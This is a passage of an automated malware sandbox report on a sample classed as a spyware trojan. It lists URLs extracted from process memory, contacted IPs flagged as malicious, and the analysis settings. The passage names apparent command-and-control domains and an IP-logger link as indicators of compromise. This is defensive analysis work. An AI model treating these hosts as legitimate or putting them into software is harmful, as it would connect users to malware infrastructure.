http://anglebug.com/4722	chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000019.00000002.2806209754.00006AE400748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744945679.00006AE4004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812080632.00006AE400D30000.00000004.00000800.00020000.00000000.sdmp	false
https://checkout.steampowered.com/	a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
https://impend-differ.biz/api	a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000019.00000002.2812958326.00006AE400DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3502	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3623	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810217952.00006AE400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3625	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810217952.00006AE400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3624	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810217952.00006AE400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://help.steampowered.com/en/	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
http://anglebug.com/3862	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000019.00000003.2398921126.00006AE400CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742340293.00006AE4002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2382291975.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2378237323.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380057243.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2378597945.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380888406.00006AE400394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2396019013.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2396891889.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2395949608.00006AE400394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380808144.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393104369.00006AE400DD0000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/4836	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://issuetracker.google.com/issues/166475273	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2378286641.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380837184.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 00000019.00000002.2810891937.00006AE400C50000.00000004.00000800.00020000.00000000.sdmp	false
https://google-ohttp-relay-join.fastly-edge.com/Tt	chrome.exe, 00000019.00000003.2441094805.00006AE40158C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441242471.00006AE401594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441134276.00006AE401590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441051239.00006AE401588000.00000004.00000800.00020000.00000000.sdmp	false
https://broadcast.st.dl.eccdnx.com	a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
https://anglebug.com/7246ar	chrome.exe, 00000019.00000002.2806787022.00006AE400830000.00000004.00000800.00020000.00000000.sdmp	false
https://impend-differ.biz/api%O	3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2243929157.0000000001482000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.0000000001484000.00000004.00000020.00020000.00000000.sdmp	false
https://steamcommunity.com/E	3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2243929157.0000000001482000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.0000000001484000.00000004.00000020.00020000.00000000.sdmp	false
http://anglebug.com/3970	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744690208.00006AE4004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://google-ohttp-relay-join.fastly-edge.com/Tr	chrome.exe, 00000019.00000003.2441094805.00006AE40158C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441242471.00006AE401594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441134276.00006AE401590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441051239.00006AE401588000.00000004.00000800.00020000.00000000.sdmp	false
https://drive-connect.cyou/apiNp	3b636bd67f.exe, 00000013.00000002.2257128691.000000000143C000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.000000000143C000.00000004.00000020.00020000.00000000.sdmp	false
https://apis.google.com	chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434420530.00006AE401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434879439.00006AE4013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434457552.00006AE40143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812413211.00006AE400D65000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817002634.00006AE4013BC000.00000004.00000800.00020000.00000000.sdmp	false
https://steamcommunity.com/workshop/	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.all	c2bea0d661.exe, 00000011.00000002.3464072835.000000000403D000.00000004.00000020.00020000.00000000.sdmp	false
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000019.00000003.2391832280.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391727899.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2386269536.00006AE400F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394026939.00006AE401130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742537643.00006AE4002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2390457029.00006AE401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391162524.00006AE400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393431782.00006AE400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391377595.00006AE40104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2388080460.00006AE401030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2392772851.00006AE400F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391783961.00006AE400A24000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	3b636bd67f.exe, 00000013.00000003.2240775221.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
https://labs.google.com/search?source=ntp	chrome.exe, 00000019.00000002.2744160805.00006AE400428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp	false
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000019.00000003.2366948695.000067A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2366620579.000067A000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	false
https://steamcommunity.com/;	a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/favicon.icofrom_play_api2	chrome.exe, 00000019.00000002.2810891937.00006AE400C50000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/5901	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3965	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://anglebug.com/7161	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://anglebug.com/7162	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	c2bea0d661.exe, 00000011.00000002.3456856261.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3461733479.0000000003E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/5906	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/2517	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/4937	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://steamcommunity.com	3b636bd67f.exe, 00000013.00000002.2257128691.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
https://issuetracker.google.com/166809097	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2811252072.00006AE400C74000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
https://lens.google.com/v3/upload	chrome.exe, 00000019.00000003.2368778386.000067A0006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2738878513.000067A00078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393431782.00006AE400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2368872994.000067A0006EC000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3832	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://www.google.comAccess-Control-Allow-Credentials:	chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp	false
https://stackoverflow.com/q/2152978/23354	BlueMail.exe, 0000000E.00000002.2328768604.0000000005E90000.00000004.08000000.00040000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
https://api.steampowered.com/	a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
https://se-blurry.biz/8c	3b636bd67f.exe, 00000013.00000003.2193344346.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	false
https://store.steampowered.com/mobile	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
https://lens.google.com/upload	chrome.exe, 00000019.00000003.2394026939.00006AE401130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393431782.00006AE400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.google.com/document/?usp=installed_webapp	chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	false
https://iplogger.org/1Pz8p7	8f25543307.exe, 00000014.00000003.2792382569.0000000005E2D000.00000004.00000020.00020000.00000000.sdmp, 8f25543307.exe, 00000014.00000003.2852968105.0000000005671000.00000004.00000020.00020000.00000000.sdmp, 8f25543307.exe, 00000014.00000003.2783101019.000000000590E000.00000004.00000020.00020000.00000000.sdmp, 8f25543307.exe, 00000014.00000003.2784760185.000000000590E000.00000004.00000020.00020000.00000000.sdmp	false
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	c2bea0d661.exe, 00000011.00000002.3456856261.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3461733479.0000000003E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.19.228	www.google.com	United States	15169	GOOGLEUS	false
80.82.65.70	unknown	Netherlands	202425	INT-NETWORKSC	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	true
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
142.250.181.78	youtube.com	United States	15169	GOOGLEUS	false
116.203.10.31	zonedw.sbs	Germany	24940	HETZNER-ASDE	true
104.21.79.7	drive-connect.cyou	United States	13335	CLOUDFLARENETUS	true
104.21.35.43	fightlsoser.click	United States	13335	CLOUDFLARENETUS	true
45.11.183.55	unknown	Germany	207408	SERVINGA-EE	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
192.168.2.7
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574898
Start date and time:	2024-12-13 18:51:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 20m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@93/65@81/18
EGA Information:	Successful, ratio: 87.5%
HCA Information:	Successful, ratio: 56% Number of executed functions: 253 Number of non-executed functions: 116
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 142.250.181.99, 172.217.17.78, 64.233.164.84, 142.250.181.3, 88.221.134.155, 199.232.210.172, 64.233.163.84, 172.217.17.67, 172.217.17.74, 172.217.19.202, 142.250.181.106, 172.217.21.42, 142.250.181.138, 142.250.181.74, 172.217.17.42, 216.58.208.234, 172.217.19.234, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 172.217.19.206, 13.107.6.158, 172.165.69.228, 2.19.198.217, 23.32.238.67, 23.206.197.24, 23.206.197.26, 23.206.197.16, 23.206.197.18, 23.206.197.32, 23.206.197.33, 23.206.197.19, 23.206.197.25, 23.206.197.17, 23.32.238.40, 23.32.238.26, 23.206.197.40, 23.206.197.41, 95.100.135.98, 95.100.135.104, 95.100.135.91, 95.100.135.105, 95.100.135.83, 95.100.135.96, 95.100.135.90, 95.100.135.88, 95.100.135.97, 13.74.129.1, 204.79.197.237, 13.107.21.237, 23.206.197.10, 23.206.197.11, 23.206.197.51, 23.206.197.57, 23.206.197.58, 142.251.41.3, 142.251.40.99, 142.251.40.195, 13.107.246.63, 172.202.163.200, 4.245.163.56, 23.218.208.109, 40.126.
